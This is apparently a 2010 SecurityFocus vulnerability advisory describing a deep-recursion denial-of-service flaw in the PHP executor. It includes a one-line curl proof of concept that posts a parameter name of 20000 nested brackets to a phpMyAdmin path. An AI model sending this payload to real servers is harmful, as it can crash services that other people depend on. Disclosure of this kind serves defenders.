PHP Executor Deep Recursion Remote Denial of Service Vulnerability

To exploit this issue, an attacker must be able to execute PHP code on a vulnerable webserver. This may be accomplished through legitimate means or by exploiting other latent vulnerabilities.

The following proof of concept is available:

$ curl http://www.example.com/phpmyadmin/ -d a`php -r 'echo str_repeat("[a]",20000);'`=1


 

Privacy Statement
Copyright 2010, SecurityFocus